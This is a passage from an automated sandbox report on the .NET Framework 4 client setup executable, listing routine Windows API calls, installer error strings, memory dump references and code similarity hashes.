                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID: Unable ro register file for clean-up$User canceled extraction...
                                                                                                                                                                    • API String ID: 3188754299-368570184
                                                                                                                                                                    • Opcode ID: 89ca71b1b3ddf46cd1afe99cdaa6ed5b2303eff3d9075057a96a0352ab0d64df
                                                                                                                                                                    • Instruction ID: c953a033a0cfd04b4ac4e565d1379915fcb9d6d12fd892618d4915a1ebd68a43
                                                                                                                                                                    • Opcode Fuzzy Hash: 89ca71b1b3ddf46cd1afe99cdaa6ed5b2303eff3d9075057a96a0352ab0d64df
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A219031504A24DBDF12AF60EC56ADE37A7BB05B60F118415F901E611AEB33E8E0DB95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
                                                                                                                                                                    • GetLastError.KERNEL32(?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,000160C2,?,?,00000000,00000000), ref: 00019D29
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010,?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,000160C2,?,?,00000000), ref: 00019D52
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 00019D59
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 00019DB2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseCreateErrorFileHandleLastProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3300431839-0
                                                                                                                                                                    • Opcode ID: 10a1014585d3d378e45aa7d3343a81f98e661e3b652796dac3a759719230de6c
                                                                                                                                                                    • Instruction ID: d640c6ee675c4cc42fd4ca5883cf7d2121f94960bb2674f4e7a4cacd0ba140b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 10a1014585d3d378e45aa7d3343a81f98e661e3b652796dac3a759719230de6c
                                                                                                                                                                    • Instruction Fuzzy Hash: A111E732D00621ABD7315B78AC157DDBAA09F45770F228320EE65AB2D1DB75DD8187D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 000336E0
                                                                                                                                                                      • Part of subcall function 0002A6D5: GetLastError.KERNEL32(00000001,00000000,0002B05E,0002CE3E,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8), ref: 0002A6D9
                                                                                                                                                                      • Part of subcall function 0002A6D5: ___set_flsgetvalue.LIBCMT ref: 0002A6E7
                                                                                                                                                                      • Part of subcall function 0002A6D5: __calloc_crt.LIBCMT ref: 0002A6FB
                                                                                                                                                                      • Part of subcall function 0002A6D5: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8,?,?,?,0002A803), ref: 0002A715
                                                                                                                                                                      • Part of subcall function 0002A6D5: GetCurrentThreadId.KERNEL32 ref: 0002A72B
                                                                                                                                                                      • Part of subcall function 0002A6D5: SetLastError.KERNEL32(00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8,?,?,?,0002A803), ref: 0002A743
                                                                                                                                                                    • __freeptd.LIBCMT ref: 000336EA
                                                                                                                                                                      • Part of subcall function 0002A8A6: TlsGetValue.KERNEL32(?,?,000336EF,00000000,?,00033720,00000000), ref: 0002A8C7
                                                                                                                                                                      • Part of subcall function 0002A8A6: TlsGetValue.KERNEL32(?,?,000336EF,00000000,?,00033720,00000000), ref: 0002A8D9
                                                                                                                                                                      • Part of subcall function 0002A8A6: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000000,?,000336EF,00000000,?,00033720,00000000), ref: 0002A8EF
                                                                                                                                                                      • Part of subcall function 0002A8A6: __freefls@4.LIBCMT ref: 0002A8FA
                                                                                                                                                                      • Part of subcall function 0002A8A6: TlsSetValue.KERNEL32(0000000E,00000000,?,000336EF,00000000,?,00033720,00000000), ref: 0002A90C
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 000336F3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$DecodeErrorInternal@4LastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 68672458-0
                                                                                                                                                                    • Opcode ID: 87a3b7ac6700a88f9fa20675caadfdfd035d2a9ab6cf1ef57fb069a1a00a4ae5
                                                                                                                                                                    • Instruction ID: 3bbfbb42582c56d9101712722843c1586d1a44e80ba6b8df17b6a244ec7cd40c
                                                                                                                                                                    • Opcode Fuzzy Hash: 87a3b7ac6700a88f9fa20675caadfdfd035d2a9ab6cf1ef57fb069a1a00a4ae5
                                                                                                                                                                    • Instruction Fuzzy Hash: 11C08C306006046FDA113B21BC0FE8A3A4D8F80350B048020B80482213DEA8E8418065
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 00027EE9
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00027F09
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00027F29
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2978645861-0
                                                                                                                                                                    • Opcode ID: f09edd98ddd450f4e728b61bfb8c386fb7ba9d689cf60ffacc35486f2bdad275
                                                                                                                                                                    • Instruction ID: 7aae96eefc9107c2ef594720d17244c460fa10a682ae5355cfca1f356442f85f
                                                                                                                                                                    • Opcode Fuzzy Hash: f09edd98ddd450f4e728b61bfb8c386fb7ba9d689cf60ffacc35486f2bdad275
                                                                                                                                                                    • Instruction Fuzzy Hash: A5115B75A00305EFCB50CF98D944A9ABBB9FF48310F248459F61597240D774EA14CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • DialogBoxParamA.USER32(00000081,00000000,00016A56,00000000), ref: 00016A32
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed while running the progress dialog., xrefs: 00016A3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DialogParam
                                                                                                                                                                    • String ID: Failed while running the progress dialog.
                                                                                                                                                                    • API String ID: 665744214-2908255965
                                                                                                                                                                    • Opcode ID: cf4e2e377e2143411547359140dbbe865cb833fadf9c8a1740ed19cdfa5e7fb6
                                                                                                                                                                    • Instruction ID: 480aaa31e88d2d31611429197cc91db2dfb031abb8c07d66f1e0fb73243fc125
                                                                                                                                                                    • Opcode Fuzzy Hash: cf4e2e377e2143411547359140dbbe865cb833fadf9c8a1740ed19cdfa5e7fb6
                                                                                                                                                                    • Instruction Fuzzy Hash: 9ED0A732784730B6E63652147C06FC61E54AF40B60F11C011F704FA1D09DA599C186CC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0001F965
                                                                                                                                                                      • Part of subcall function 00022C43: __CxxThrowException@8.LIBCMT ref: 00022C6A
                                                                                                                                                                      • Part of subcall function 00022C43: _memmove.LIBCMT ref: 00022CBB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throw_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3426943727-0
                                                                                                                                                                    • Opcode ID: d5426c61231117250f66092ec06d0a6376cdccf9516abecc919e557e74e63f39
                                                                                                                                                                    • Instruction ID: 30111b1bdb6d3149682825825ec3ce929803ba5b2db3e4b0708b5aa88553ef99
                                                                                                                                                                    • Opcode Fuzzy Hash: d5426c61231117250f66092ec06d0a6376cdccf9516abecc919e557e74e63f39
                                                                                                                                                                    • Instruction Fuzzy Hash: 81322271508386DFC370DF68C484ADEBBE4BF89304F54492EE9898B252DB70A985CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00000000,000000FF), ref: 0001A33B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 1659193697-3887548279
                                                                                                                                                                    • Opcode ID: 7181a779fa216a9ea61e02d4527f27748b8d8acfc0481244eb2ec0d38420c66c
                                                                                                                                                                    • Instruction ID: d770fb5fb2414ca9e062c6d2bbe25915e860efb685b0f19bb0a391a9e4f3094e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7181a779fa216a9ea61e02d4527f27748b8d8acfc0481244eb2ec0d38420c66c
                                                                                                                                                                    • Instruction Fuzzy Hash: E2516531A01215DFCB25DFA4C8917EDB7B1AF06320F15416AE815BB252DB319FC5CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,00000000,?), ref: 0001B443
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B452
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 8ae514943a29f1e75311168a75ac6fa222f854c0426c12bdfc0f52250d10b365
                                                                                                                                                                    • Instruction ID: cd43ccdb93b5ac377bc6536cbf455bcd3a0ec65e43bf56ff2a0e4f7223ce516d
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ae514943a29f1e75311168a75ac6fa222f854c0426c12bdfc0f52250d10b365
                                                                                                                                                                    • Instruction Fuzzy Hash: 4A11C276A00315DFEB108F99DCC09E577A5BF85328B158239EA24C7263C775DC85DB80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0001B2B9
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B2C6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                                    • Opcode ID: f5044bb84b5755f5a5ac75a87694be2f29f932d0d44e8b25c15797696ccc20d2
                                                                                                                                                                    • Instruction ID: 55a8cc34466fb38195dba3c1a434caf2123798c2a7474897fcf7f6d3e8eb955e
                                                                                                                                                                    • Opcode Fuzzy Hash: f5044bb84b5755f5a5ac75a87694be2f29f932d0d44e8b25c15797696ccc20d2
                                                                                                                                                                    • Instruction Fuzzy Hash: C501C436A411206FE3258B1ADC04FAA7B68EB86770F154254FE15AB3D2C735EC4196D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0001B34B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B355
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                                                    • Opcode ID: ece12e119eef233f518ddbb98011e656335a3e509d9a89abd8b98b26712b1c7b
                                                                                                                                                                    • Instruction ID: cffea3c198f70f0df70f899c17f5380f73e3fb1d176dbc8f6f6e3652dfa24a4c
                                                                                                                                                                    • Opcode Fuzzy Hash: ece12e119eef233f518ddbb98011e656335a3e509d9a89abd8b98b26712b1c7b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF09073D01179EBEB128F91DD049EA7B68AF457B4B014224BE20E7261D779DE10A7D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0001B3B0
• GetLastError.KERNEL32 ref: 0001B3BA
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 7f6c4156ad109a7641a752b99138d0746db096e178f3c6b620daa149470a2a68
• Instruction ID: 4df6555ce8feb5718121daeedfc0006a311c5551f1ece1f431f4a1f14898dc46
• Opcode Fuzzy Hash: 7f6c4156ad109a7641a752b99138d0746db096e178f3c6b620daa149470a2a68
• Instruction Fuzzy Hash: 2EF09633D11139ABDB11CF90DD049DA7A68AF41774B024264BE20F7150E375DE1097D0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetCurrentDirectoryW.KERNELBASE(00000000,00015E5F,00000000,?,?,00015E5F), ref: 00019682
• GetLastError.KERNEL32(?,?,00015E5F), ref: 0001968C
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CurrentDirectoryErrorLast
• String ID:
• API String ID: 152501406-0
• Opcode ID: c7a72e3414ae07fb12e8224859b3bdbd8205004a0ae793badcf06507efa65653
• Instruction ID: 4a9a48a7fe1f39b4c819faf213314ac09e5de3aa3943d54854832d257a66a704
• Opcode Fuzzy Hash: c7a72e3414ae07fb12e8224859b3bdbd8205004a0ae793badcf06507efa65653
• Instruction Fuzzy Hash: 87F0E233C01136FBDB215795CD29BCDBAA49F10764F224174AE00B7110D73ACE80D6E4
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
• GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 03296a67499aa7a0b2c5aad6268a5807e9f771368e05952f1dd8ba63c755d488
• Instruction ID: 598ca6e417bf72324438b9af9c2cb9bed7c7fa324ca6aaa05acb08394d7c2fce
• Opcode Fuzzy Hash: 03296a67499aa7a0b2c5aad6268a5807e9f771368e05952f1dd8ba63c755d488
• Instruction Fuzzy Hash: E2E0DF33904129BFAB254F81EC0AEEB3F9DEF043B0B108129FA18C6010E676DD5087E0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 0003370B
  • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
  • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
  • Part of subcall function 000336DB: __getptd_noexit.LIBCMT ref: 000336E0
  • Part of subcall function 000336DB: __freeptd.LIBCMT ref: 000336EA
  • Part of subcall function 000336DB: ExitThread.KERNEL32 ref: 000336F3
• __XcptFilter.LIBCMT ref: 0003372C
  • Part of subcall function 00029D0A: __getptd_noexit.LIBCMT ref: 00029D10
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
• String ID:
• API String ID: 418257734-0
• Opcode ID: 87d68b3f2282d5150478a001f7dde73e0b6a3b52de3c4ff240abb66c72e21a21
• Instruction ID: 584eeae82cb5a1f601d6288aa774154782d5e01475f0ce6e999be886ebe65ec3
• Opcode Fuzzy Hash: 87d68b3f2282d5150478a001f7dde73e0b6a3b52de3c4ff240abb66c72e21a21
• Instruction Fuzzy Hash: C1E0ECB1A44604AFE718BBA0D94AEAD7779AF45311F204089F1025B2A3CF759940EA21
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(00000000,0002809D,00000000,00025279,?,?,?,00000000,00028585,?,00000000,?,?,000000CC,00020145), ref: 00027E25
• GetLastError.KERNEL32 ref: 00027E2F
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification
• String ID:
• API String ID: 1687624791-0
• Opcode ID: 990ab0ce616a730d5b4cea752463308b40cabdd1ebac3bffd29fed9a3ec1d302
• Instruction ID: 6c6231ce6aac757c1ea666038c971cade120933c62beaa4b146be8d8446e2de5
• Opcode Fuzzy Hash: 990ab0ce616a730d5b4cea752463308b40cabdd1ebac3bffd29fed9a3ec1d302
• Instruction Fuzzy Hash: 90D0C9707142124BEFB01F31A9087A232E8AF18742F1648E9A59AC2000EB64C8809660
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,?), ref: 0001B278
• RtlFreeHeap.NTDLL(00000000), ref: 0001B27F
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: b87040fe17a49bc81f0048967baba56812fd550ebe3a197b943eca20bf72cc4e
• Instruction ID: 3fa362e10ca8d1fae9f1aa8f497b5985ad5f77986232c5508fee1c89aeaf79a1
• Opcode Fuzzy Hash: b87040fe17a49bc81f0048967baba56812fd550ebe3a197b943eca20bf72cc4e
• Instruction Fuzzy Hash: D1C0123214420877EB501BE1AC0CFE93B9C9B84B52F444000F70985050D63584909691
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001B25A
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0001B261
                                                                                                                                                                    Memory Dump Source
